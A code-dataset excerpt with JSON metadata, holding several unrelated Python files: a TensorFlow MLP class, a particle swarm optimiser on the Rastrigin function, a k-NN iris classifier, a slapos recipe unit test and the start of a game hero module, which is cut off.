len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n if len(y_true.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n y_pred = self.net.run(self._out, feed_dict={self._X: X})\n u = ((y_true - y_pred) ** 2).sum()\n v = ((y_true - y_true.mean()) ** 2).sum()\n return (1 - u/v)\n\n def predict(self, X):\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n if type(X) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n # Prediction\n pred = self.net.run(self._out, feed_dict={self._X: X})\n return pred\n\n def save(self, filename):\n fname = os.path.basename(filename)\n directory = os.path.dirname(filename)\n _, file_extension = os.path.splitext(filename)\n if directory != \"\":\n directory += \"/\"\n model_path = directory + fname + \".tfmodel\" \n self._model_path = model_path\n import pickle\n with open(filename, mode='wb') as outfile:\n pickle.dump(self, outfile, protocol=4)\n\n def load(self, filename):\n import pickle\n with open(filename, mode='rb') as f:\n rna = pickle.load(f)\n self.__dict__.update(rna.__dict__)\n self._initializers(self._x_shape, self._y_shape)\n \n def _save_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._model_path\n #path = os.path.abspath(model_file)\n if not os.path.isdir(model_file):\n os.mkdir(model_file)\n model_file = model_file + \"/\"\n self._save_path = self._saver.save(self.net, model_file)\n \n def _load_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._save_path\n self._saver.restore(self.net, model_file)\n\n def _serialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is tuple:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if not hasattr(h[1], '__call__'):\n raise Exception(\"invalid hidden layer activation function\")\n out.append([h[0], _ser_fn_activation(h[1])])\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type\")\n return tuple(out)\n\n def _unserialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is list:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if type(h[1]) is not str:\n raise Exception(\"invalid hidden layer activation function\")\n out.append(tuple([h[0], _unser_fn_activation(h[1])]))\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type:\", type(h))\n return tuple(out)\n\n def __getstate__(self):\n print(\"getstate\")\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n state = {\n \"mse_target\": self.mse_target,\n \"max_epochs\": self.max_epochs,\n \"_verbose\": self._verbose,\n \"_x_shape\": self._x_shape,\n \"_y_shape\": self._y_shape,\n \"mse_train\": self.mse_train,\n \"mse_test\": self.mse_test,\n \"hidden_layer_sizes\":\n self._serialize_hidden_layers(self.hidden_layer_sizes),\n \"output_fn\": _ser_fn_activation(self.output_fn),\n \"learning_rate\": self.learning_rate,\n }\n if hasattr(self, \"_model_path\"):\n self._save_tf()\n state[\"_model_path\"] = self._model_path\n state[\"_save_path\"] = self._save_path\n else:\n print(\"### No path to save the model\")\n return state\n\n def __setstate__(self, state):\n print(\"setstate\")\n # Restore instance attributes (i.e., filename and lineno).\n hl = self._unserialize_hidden_layers(state[\"hidden_layer_sizes\"])\n state[\"hidden_layer_sizes\"] = hl\n state[\"output_fn\"] = _unser_fn_activation(state[\"output_fn\"])\n self.__dict__.update(state)\n # Restore the previously opened file's state. To do so, we need to\n # reopen it and read from it until the line count is restored.\n if hasattr(self, \"_save_path\"):\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n # Saver\n self._saver = tf.train.Saver()\n # Load model\n self._load_tf()\n else:\n self._initializers(self._x_shape, self._y_shape)\n print(\"### no model to load\")\n\n def __enter__(self):\n print(\"enter\")\n self._initialized = False\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n print(\"exit\")\n if hasattr(self, \"net\"):\n self.net.close()\n\n def close(self):\n \"\"\"\" \n Closes the RNA.\n Closes the underlay session with TensorFlow.\n \"\"\"\n if hasattr(self, \"net\") and self.net is not None:\n self.net.close()\n\n\ndef _ser_fn_activation(fn):\n \"\"\"\n Return the name of one function.\n \"\"\"\n # if fn is tf.nn.relu:\n # return \"relu\"\n # elif tf.nn.sigmoid.__name__:\n # return \"sigmoid\"\n # raise Exception(\"function unknown, can't serialize\")\n return fn.__name__\n\n\ndef _unser_fn_activation(name):\n \"\"\"\n Return the function with name.\n \"\"\"\n if name == \"relu\":\n return tf.nn.relu\n elif name == \"sigmoid\":\n return tf.nn.sigmoid\n elif name == \"identity\":\n return tf.identity\n elif name == \"round\":\n return tf.round\n raise Exception(\"unknown function\")\n\ndef _make_matrix_classes(y):\n y_max = max(y)[0]\n out = np.zeros((y.shape[0], y_max + 1), dtype=int)\n for i in range(out.shape[0]):\n out[i, y[i]] = 1\n return out\n\nif __name__ == '__main__':\n from sklearn.datasets import load_iris\n from sklearn.datasets import load_linnerud\n from sklearn.model_selection import StratifiedKFold\n from sklearn.model_selection import ShuffleSplit\n\n # with MLP(\n # mse_target=1e-4,\n # max_epochs=100000,\n # hidden_layer_sizes=(16, 100, (12, tf.nn.sigmoid)),\n # output_fn=tf.nn.sigmoid,\n # verbose=False,\n # ) as rna:\n # iris = load_iris()\n\n # skf = StratifiedKFold(n_splits=4)\n # train_index, test_index = next(iter(skf.split(iris.data, iris.target)))\n\n # X_train = iris.data[train_index]\n # y_train = iris.target[train_index]\n # X_test = iris.data[test_index]\n # y_test = iris.target[test_index]\n\n # X_train = np.array(X_train)\n # y_train = np.array(y_train)\n # X_test = np.array(X_test)\n # y_test = np.array(y_test)\n\n # y_train = np.reshape(y_train, (y_train.shape[0], 1))\n # y_test = np.reshape(y_test, (y_test.shape[0], 1))\n\n # y_train = _make_matrix_classes(y_train)\n # y_test = _make_matrix_classes(y_test)\n\n # rna.fit(X_train, y_train)\n # y_pred = rna.predict(X_test)\n # s = rna.score(X_test, y_test)\n # print(\"score: {}\".format(s))\n \n with MLP(\n mse_target=1e-8,\n max_epochs=1e8,\n hidden_layer_sizes=(6, 30, 30, 6),\n output_fn=tf.nn.sigmoid,\n verbose=True,\n learning_rate=1e-6,\n ) as rna:\n linnerud = load_linnerud()\n\n ss = ShuffleSplit()\n train_index, test_index = next(iter(ss.split(linnerud.data)))\n\n X_train = linnerud.data[train_index]\n y_train = linnerud.target[train_index]\n X_test = linnerud.data[test_index]\n y_test = linnerud.target[test_index]\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n X_test = np.array(X_test)\n y_test = np.array(y_test)\n\n norm_x = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n norm_y = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n\n X_train = norm_x.fit_transform(X_train)\n X_test = norm_x.transform(X_test)\n y_train = norm_y.fit_transform(y_train)\n y_test = norm_y.transform(y_test)\n\n rna.fit(X_train, y_train)\n s = rna.score(X_test, y_test)\n print(\"score: {}\".format(s))\n \n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_test))\n print(norm_y.inverse_transform(y_pred))\n rna.save(\"mlp.model\")\n\n with MLP() as rna:\n rna.load(\"mlp.model\")\n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_pred))\n", "sub_path": "mlp/mlp.py", "file_name": "mlp.py", "file_ext": "py", "file_size_in_byte": 16655, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tensorflow.identity", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.variance_scaling_initializer", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.zeros_initializer", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.squared_difference", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.InteractiveSession", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.finfo", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 140, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 145, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 210, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 234, "usage_type": "call"}, {"api_name": "os.path", "line_number": 234, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 242, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 256, "usage_type": "call"}, {"api_name": "tensorflow.InteractiveSession", "line_number": 336, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 338, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 338, "usage_type": "attribute"}, {"api_name": "tensorflow.InteractiveSession", "line_number": 349, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 383, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 385, "usage_type": "attribute"}, {"api_name": "tensorflow.identity", "line_number": 387, "usage_type": "attribute"}, {"api_name": "tensorflow.round", "line_number": 389, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 394, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 442, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.load_linnerud", "line_number": 446, "usage_type": "call"}, {"api_name": "sklearn.model_selection.ShuffleSplit", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 459, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 461, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 462, "usage_type": "call"}]} {"seq_id": "282300043", "text": "# File: pso_rastrigin.py\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport math\n\n# N-Dimensional Rastrigin function\ndef rastrigin(*X):\n dim = len(X)\n return 10*dim + sum([(x**2 - 10 * np.cos(2 * np.pi * x)) for x in X])\n\n# Usual limits for evaluate the Rastrigin function\nlower_limit=-5.12\nupper_limit=5.12\n\n# We'll use 10 particles in a 2D space\nn_particles=10\nn_dimensions=2\n\n\n# Initialize the particle positions and their velocities\nP = lower_limit + (upper_limit - lower_limit) * np.random.rand(n_particles, n_dimensions)\nassert P.shape == (n_particles, n_dimensions)\nV = np.zeros(P.shape)\n \n# Initialize the global and local fitness to the worst possible\nfitness_gbest = np.inf\nfitness_lbest = fitness_gbest * np.ones(n_particles)\n\n# Initialize the best local and global points\nP_lbest=1*P\nP_gbest= 1*P_lbest[0]\n\nfitness_P = np.zeros(P.shape)\n\nfor I in range(0, n_particles):\n if rastrigin(P_lbest[I][0],P_lbest[I][1]) < rastrigin(P_gbest[0],P_gbest[1]):\n P_gbest=1*P_lbest[I]\n\ndef iteration():\n \n global P,P_lbest,P_gbest,V\n weight=0.9\n C1=0.3\n C2=0.2\n g_best = rastrigin(P_gbest[0],P_gbest[1])\n print(\"Best particle in:\",P_gbest,\" gbest: \",g_best)\n \n # Update the particle velocity and position\n for I in range(0, n_particles):\n for J in range(0, n_dimensions):\n R1 = np.random.rand() # Uniform random number\n R2 = np.random.rand() # Uniform random number \n V[I][J] = (weight*V[I][J]\n + C1*R1*(P_lbest[I][J] - P[I][J]) \n + C2*R2*(P_gbest[J] - P[I][J]))\n P[I][J] = P[I][J] + V[I][J]\n if rastrigin(P[I][0],P[I][1]) < rastrigin(P_lbest[I][0],P_lbest[I][1]):\n P_lbest[I]=1*P[I]\n\n if rastrigin(P_lbest[I][0],P_lbest[I][1]) < rastrigin(P_gbest[0],P_gbest[1]):\n P_gbest=1*P_lbest[I]\n \nif __name__ == '__main__':\n \n it_max = 1\n while it_max <= 1000:\n print(\"Iteration: \",it_max)\n iteration()\n it_max += 1\n\n # Plot the results\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n plt.title(\"Rastrigin Function\")\n X = np.linspace(-5.12, 5.12, 200) \n Y = np.linspace(-5.12, 5.12, 200) \n X, Y = np.meshgrid(X, Y)\n Z = rastrigin(X, Y)\n\n surf = ax.plot_surface(X, Y, Z, \n rstride=1, cstride=1, cmap=cm.plasma, \n linewidth=0, antialiased=False)\n\n ax.set_xlabel('$x$')\n ax.set_ylabel('$y$')\n ax.set_zlabel('$z$')\n fig.colorbar(surf)\n best = rastrigin(P_gbest[0], P_gbest[1])\n ax.plot([0,P_gbest[0]],[0,P_gbest[1]],[100,best],color='black')\n ax.scatter(0., 0., 100., c='green', marker='o')\n ax.scatter(P_gbest[0], P_gbest[1], best, c='black', marker='^')\n text = '\\nBest particle at: ('+str(P_gbest[0])+','+str(P_gbest[0])+')'\n ax.text2D(0.5,0,text,ha='center',va='top',transform=ax.transAxes)\n plt.show()", "sub_path": "Practica-6/pso_rastrigin.py", "file_name": "pso_rastrigin.py", "file_ext": "py", "file_size_in_byte": 2961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.cos", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 55, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.cm.plasma", "line_number": 84, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}]} {"seq_id": "366969403", "text": "from sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nfrom argparse import ArgumentParser\nimport numpy as np\nimport math\niris = load_iris()\n\nparser = ArgumentParser()\nparser.add_argument(\"-k\", type=int, action=\"store\", dest=\"k_value\")\nparser.add_argument(\"--print-guesses\", action=\"store_true\", dest=\"print_guesses\")\nparser.add_argument('kvals', metavar='N', type=int, nargs='+')\nargs = parser.parse_args()\n\nx_iris, y_iris = iris.data, iris.target\nx_names, y_names = iris.feature_names, iris.target_names\n\nnormalizador = StandardScaler().fit(x_iris)\nXn_iris = normalizador.transform(x_iris)\n\nx_train, x_test, y_train, y_test = train_test_split(x_iris, y_iris, test_size = 0.25)\n\ndef l2_dist(p, q):\n squares_sum = 0.0\n n = len(p)\n if n != len(q):\n raise ValueError(\"Oh noes!\")\n for i in (i for i in range(n)):\n squares_sum += (p[i] - q[i])**2\n return math.sqrt(squares_sum)\n\ndef f(D, x, k):\n dist = []\n labels = []\n i = 0\n for val in D:\n dist.append((l2_dist(val, x), i))\n i += 1\n dist.sort(key = lambda t: t[0])\n\n for i in range(k):\n labels.append(y_train[dist[i][1]])\n return max(labels, key=labels.count), (labels.count(max(labels, key=labels.count))/k)*100, \n\nfor k_value in args.kvals:\n percentages = []\n for i in range(10):\n if(args.print_guesses):\n print(\"%-15s%-15s%-15s\"%(\"Etiqueta\", \"Correcta\", \"Certeza\"))\n correct_labelling_count = 0\n for i in range(len(x_test)):\n l, p = f(x_train, x_test[i], k_value)\n correct_label = y_test[i]\n if(args.print_guesses):\n print(\"%-15i%-15i%-15.2f\"%(l, correct_label, p))\n if l == correct_label:\n correct_labelling_count += 1\n percentages.append(correct_labelling_count/len(x_test))\n percentages = np.array(percentages, dtype=float)\n\n print(\"K = %i\"%(k_value))\n print(\"Media = %.2f%%\"%(percentages.mean()*100))\n print(\"Desv. Est. = %.2f\"%(percentages.std()))", "sub_path": "Patrones/Clase10/ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 2128, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 8, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}]} {"seq_id": "145715049", "text": "import os\nimport sys\nimport unittest\n\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nfrom slapos.recipe import generic_cloudooo\n\nclass TestGenericCloudooo(unittest.TestCase):\n def new_recipe(self, options):\n buildout = {\n 'buildout': {\n 'bin-directory': '',\n 'find-links': '',\n 'allow-hosts': '',\n 'develop-eggs-directory': '',\n 'eggs-directory': '',\n 'python': 'testpython',\n },\n 'testpython': {\n 'executable': sys.executable,\n },\n 'slap-connection': {\n 'computer-id': '',\n 'partition-id': '',\n 'server-url': '',\n 'software-release-url': '',\n }\n }\n return generic_cloudooo.Recipe(buildout=buildout, name='generic_cloudooo', options=options)\n\n def setUp(self):\n self.test_dir = mkdtemp()\n def tearDown(self):\n if os.path.exists(self.test_dir):\n rmtree(self.test_dir)\n\n def test_install(self):\n # Basic check\n config_file_path = os.path.join(self.test_dir, \"test_install_configuration_file_etc_cloudooo-X.cfg\")\n recipe = self.new_recipe({\n \"ip\": \"test_install_ip\",\n \"environment\": \"test_install=environment\",\n \"mimetype_entry_addition\": \"text/install mimetype/entry addition\",\n \"ooo-binary-path\": \"test_install_ooo_binary_path\",\n \"ooo-paster\": \"test_install_ooo_paster\",\n \"ooo-uno-path\": \"test_ooo_uno_path\",\n \"port\": \"123\",\n \"openoffice-port\": \"234\",\n \"configuration-file\": config_file_path,\n \"data-directory\": os.path.join(self.test_dir, \"test_install_data_directory_srv_cloudooo-X\"),\n \"wrapper\": os.path.join(self.test_dir, \"test_install_wrapper_service_cloudooo-X\"),\n })\n recipe.install()\n data = open(config_file_path).read()\n self.assertIn(\"[app:main]\", data)\n self.assertIn(\"[server:main]\", data)\n\n # Check if mimetype_registry is well ordered\n self.assertIn(\"\\n text/install mimetype/entry addition\\n text/* * ooo\\n\", data)\n\n # Check OnlyOffice entries\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/vnd.openxmlformats-officedocument.presentationml.presentation application/x-asc-presentation x2t\",\n \" application/vnd.openxmlformats-officedocument.spreadsheetml.sheet application/x-asc-spreadsheet x2t\",\n \" application/vnd.openxmlformats-officedocument.wordprocessingml.document application/x-asc-text x2t\",\n \"\",\n ]), data)\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/x-asc-presentation application/vnd.openxmlformats-officedocument.presentationml.presentation x2t\",\n \" application/x-asc-spreadsheet application/vnd.openxmlformats-officedocument.spreadsheetml.sheet x2t\",\n \" application/x-asc-text application/vnd.openxmlformats-officedocument.wordprocessingml.document x2t\",\n \"\",\n ]), data)\n", "sub_path": "slapos/test/recipe/test_generic_cloudooo.py", "file_name": "test_generic_cloudooo.py", "file_ext": "py", "file_size_in_byte": 2803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 21, "usage_type": "attribute"}, {"api_name": "slapos.recipe.generic_cloudooo.Recipe", "line_number": 30, "usage_type": "call"}, {"api_name": "slapos.recipe.generic_cloudooo", "line_number": 30, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}]} {"seq_id": "597390721", "text": "# -*- coding: utf-8 -*-\n\n__author__ = 'Wang Chao'\n__date__ = '12/30/13'\n\n\nfrom mongoengine import DoesNotExist\nfrom core.mongoscheme import MongoHero, MongoAchievement, MongoHeroSoul, MongoCharacter\nfrom core.signals import hero_add_signal, hero_changed_signal, hero_step_up_signal, hero_to_soul_signal\nfrom core.formation import Formation\nfrom core.exception import SanguoException\nfrom core.resource import Resource\nfrom utils import cache\nfrom core.msgpipe import publish_to_char\nfrom utils import pack_msg\nfrom utils.functional import id_generator\nfrom preset.settings import HERO_MAX_STEP, HERO_START_STEP, HERO_STEP_UP_SOCKET_AMOUNT\nfrom preset.data import HEROS, ACHIEVEMENTS, MONSTERS\nfrom preset import errormsg\nimport protomsg\n\nfrom dll import external_calculate\n\ndef char_heros_dict(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return {h.id: h for h in heros}\n\ndef char_heros_obj(char_id):\n heros = char_heros_dict(char_id)\n return [Hero.cache_obj(i) for i in heros.keys()]\n\n\ndef cal_hero_property(original_id, level, step):\n \"\"\"\n\n @param original_id: hero original id\n @type original_id: int\n @param level: hero level (char level)\n @type level: int\n @return: (attack, defense, hp)\n @rtype: tuple\n \"\"\"\n hero = HEROS[original_id]\n\n attack = external_calculate.Hero.attack(level, step, hero.quality, hero.attack_growing)\n defense = external_calculate.Hero.defense(level, step, hero.quality, hero.defense_growing)\n hp = external_calculate.Hero.hp(level, step, hero.quality, hero.hp_growing)\n\n return attack, defense, hp\n\n\ndef cal_monster_property(oid, level):\n monster = MONSTERS[oid]\n\n attack = external_calculate.Hero.attack(level, 0, monster.quality, monster.attack)\n defense = external_calculate.Hero.defense(level, 0, monster.quality, monster.defense)\n hp = external_calculate.Hero.hp(level, 0, monster.quality, monster.hp)\n\n return attack, defense, hp\n\n\nclass FightPowerMixin(object):\n @property\n def power(self):\n a = self.attack * 2.5 * (1 + self.crit / 200.0)\n # b = (self.hp + self.defense * 5) * (1 + self.dodge / 2.0)\n b = self.hp + self.defense * 5\n return int(a + b)\n\n\nclass Hero(FightPowerMixin):\n def __init__(self, hid):\n self.hero = MongoHero.objects.get(id=hid)\n char = MongoCharacter.objects.get(id=self.hero.char)\n\n self.id = hid\n self.oid = self.hero.oid\n self.step = self.hero.step\n self.progress = self.hero.progress\n self.level = char.level\n self.char_id = char.id\n\n self.attack, self.defense, self.hp = \\\n cal_hero_property(self.oid, self.level, self.step)\n\n self.model_hero = HEROS[self.oid]\n self.crit = self.model_hero.crit\n self.dodge = self.model_hero.dodge\n self.anger = self.model_hero.anger\n\n self.default_skill = self.model_hero.default_skill\n\n self.skills = [int(i) for i in self.model_hero.skills.split(',')]\n\n self._add_equip_attrs()\n self._add_achievement_buffs()\n\n def _add_equip_attrs(self):\n from core.item import Equipment\n f = Formation(self.char_id)\n socket = f.find_socket_by_hero(self.id)\n if not socket:\n return\n\n # 先把装备数值加到人物上\n equipments = []\n for x in ['weapon', 'armor', 'jewelry']:\n equip_id = getattr(socket, x)\n if equip_id:\n equip = Equipment(self.char_id, equip_id)\n self.attack += equip.attack\n self.defense += equip.defense\n self.hp += equip.hp\n\n equipments.append(equip)\n\n # 然后加成人物的专属装备\n additions = {}\n special_equipments = self.model_hero.special_equipments\n if special_equipments:\n for equip in equipments:\n _cls = equip.equip.cls\n if _cls not in special_equipments:\n continue\n\n _tp = equip.equip.tp\n additions[_tp] = additions.get(_tp, 0) + special_equipments[_cls]\n\n for _tp, _add_percent in additions.items():\n if _tp == 1:\n # attack\n self.attack *= (1 + _add_percent / 100.0)\n elif _tp == 2:\n # defense\n self.defense *= (1 + _add_percent / 100.0)\n else:\n # hp\n self.hp *= (1 + _add_percent / 100.0)\n self.hp = int(self.hp)\n\n # 最后再把宝石加上\n for equip in equipments:\n for k, v in equip.gem_attributes.iteritems():\n value = getattr(self, k)\n setattr(self, k, value + v)\n\n\n def _add_achievement_buffs(self):\n try:\n mongo_ach = MongoAchievement.objects.get(id=self.char_id)\n except DoesNotExist:\n return\n\n buffs = {}\n for i in mongo_ach.complete:\n ach = ACHIEVEMENTS[i]\n if not ach.buff_used_for:\n continue\n\n buffs[ach.buff_used_for] = buffs.get(ach.buff_used_for, 0) + ach.buff_value\n\n for k, v in buffs.iteritems():\n value = getattr(self, k)\n if k == 'crit':\n new_value = value + v / 100\n else:\n new_value = value * (1 + v / 10000.0)\n\n new_value = int(new_value)\n setattr(self, k, new_value)\n\n\n def save_cache(self):\n cache.set('hero:{0}'.format(self.id), self)\n\n @staticmethod\n def cache_obj(hid):\n h = cache.get('hero:{0}'.format(hid))\n if h:\n return h\n\n h = Hero(hid)\n h.save_cache()\n return h\n\n\n @property\n def max_socket_amount(self):\n # 当前升阶全部孔数\n if self.step >= HERO_MAX_STEP:\n return 0\n return HERO_STEP_UP_SOCKET_AMOUNT[self.step]\n\n @property\n def current_socket_amount(self):\n # 当前已经点亮的孔数\n return self.hero.progress\n\n\n def step_up(self):\n # 升阶\n if self.step >= HERO_MAX_STEP:\n raise SanguoException(\n errormsg.HERO_REACH_MAX_STEP,\n self.char_id,\n \"Hero Step Up\",\n \"Hero {0} reach max step {1}\".format(self.id, HERO_MAX_STEP)\n )\n\n resource_needs = {}\n cost_gold = external_calculate.Hero.step_up_using_gold(self.model_hero.quality)\n\n resource_needs['gold'] = -cost_gold\n soul_needs_amount = external_calculate.Hero.step_up_using_soul_amount(self.model_hero.quality)\n\n hs = HeroSoul(self.char_id)\n self_soul_amount = hs.soul_amount(self.oid)\n\n common_soul_needs = soul_needs_amount - self_soul_amount\n if common_soul_needs <= 0:\n # don't need common soul\n resource_needs['souls'] = [(self.oid, 